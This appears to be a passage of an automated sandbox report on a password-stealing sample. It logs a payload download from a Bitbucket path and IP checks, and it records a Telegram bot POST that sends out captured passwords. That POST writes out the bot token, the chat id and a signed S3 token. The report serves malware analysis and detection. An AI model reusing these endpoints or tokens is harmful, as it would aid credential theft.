            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /ntim1478/gpmaw/downloads/240_Cobsfhiygmx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
            Source: global trafficHTTP traffic detected: GET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/d4025bf5-bb79-4526-ae33-7a2e4ade5334/240_Cobsfhiygmx?response-content-disposition=attachment%3B%20filename%3D%22240_Cobsfhiygmx%22&AWSAccessKeyId=ASIA6KOSE3BNDW6O2X3G&Signature=2chtfxoFxVQH%2B%2Bqk1LYozF4rZ%2B0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEID%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIAD1NYAHfsojP08kbtMfuAOMGAEvCe3UKQ8UuqEcK7AUAiBLFY8fCNgsv5yXRVa1b5QNwmml9rALfaMKgd8jdopQyyqnAggoEAAaDDk4NDUyNTEwMTE0NiIMfAZ8Us6gNEO9lXe4KoQC4H3JCLPChoPHuNq8eVCV0VMfd0IICdqgHHTSS7ANzAU4dth3BBqgfGziNIRR91nsxqTwbAAkR9UbQFCz06yniB%2BRGncxwoJCSnWAnC0PMUZxzU%2B%2BmfP%2FabATRJ9BblkOl1DPLVzf%2FJK1O6swKVUCdmPXu9Jkpx0Zs3JpqA2SUfKf9kMOAbhud5%2B1kxcQ6T7uVBLz8q4gm46LDNyHkSdwPE%2FQPgP3oIs4bSwQ5TMxJgIO5MbAPud6%2Bz%2FVgFMzq8rBGnCYT%2F4UbUFOLOxmP7f%2FDVGr5XggPH5IbOKF9s2N5SU%2B%2B%2BFpTKfe55tJ6Uv%2BfHOKA0oQO%2BP7Wdzhn3fln1%2B7PoGjL2cwk%2BqVugY6ngGYCJOQQCMy7ggWig9zh2r3BmXcbjQcgkcKcTBPK9af%2FavWTGfdHkiCsWui9miH9txKAmMYOb08nXhpPgiwJXBhhGW9aVZgTRRjdb2Sv%2FPIWSb4mnaUlx07x5vLgIpzF7bcB%2BXCGAwY9Fu1PDZraBoc98lDjGKEsMeyI4ZoviGm%2Fw7CfZ%2BnLixdbdCHlHxYrlVAS%2BUU8DDCuagK%2FZVUiA%3D%3D&Expires=1732607003 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: bitbucket.org
            Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0dc18a308c59Host: api.telegram.orgContent-Length: 537Connection: Keep-Alive
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.0000000026535000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.0000000026276000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.00000000263C5000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.00000000260FA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034A3E000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034B53000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034AF4000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034D60000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034ADA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.00000000289FA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028A96000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028B11000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028AB0000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/h
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/p
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: yihfsboC.pif, 00000017.00000003.1647444875.000000003753B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2547471233.00000000374F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
            Source: yihfsboC.pif, 0000000E.00000002.2542798252.0000000028C83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.c
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
            Source: yihfsboC.pif, 00000017.00000003.1647444875.000000003753B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2547471233.00000000374F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: yihfsboC.pif, 00000017.00000003.1647444875.000000003753B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cfdm
            Source: yihfsboC.pif, 00000017.00000003.1647444875.000000003753B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2547471233.00000000374F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co~eE
            Source: EPTMAcgvNZ.exe, EPTMAcgvNZ.exe, 00000000.00000002.1396601704.0000000020840000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1351068324.00000000217FB000.00000004.00000020.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1351068324.000000002179D000.00000004.00000020.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1415066252.000000007FB20000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1409907919.0000000021A70000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1396601704.00000000207F0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000000.1351694799.0000000000416000.00000002.00000001.01000000.00000006.sdmp, yihfsboC.pif, 0000000E.00000001.1352324440.00000000011AF000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000000.1460253775.0000000000416000.00000002.00000001.01000000.00000006.sdmp, yihfsboC.pif, 0000001A.00000000.1548597466.0000000000416000.00000002.00000001.01000000.00000006.sdmp, yihfsboC.pif.0.drString found in binary or memory: http://www.pmail.com
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.0000000026535000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.0000000026276000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.00000000263C5000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.00000000260F4000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.00000000260FA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034A3E000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034B53000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034AF4000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034A76000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034ADA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.00000000289FA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028A96000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028B11000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028AB0000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000260EC000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.0000000026535000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.0000000026276000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.00000000263C5000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.00000000260FA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034A3E000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034B53000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034AF4000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034A76000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034ADA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.00000000289FA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028A96000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028B11000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028AB0000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgpj
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.f
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1353822380.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/;
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1354974339.0000000000829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/d4025bf5-bb79-
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1353822380.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/d4025bf5-b
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1353822380.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1396601704.00000000208FD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/dow
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1396601704.0000000020840000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1353822380.00000000007B6000.00000004.00000020.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1396601704.00000000208E0000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1353822380.000000000076E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/downloads/240_Cobsfhiygmx
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: EPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
            Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
            Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
            Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
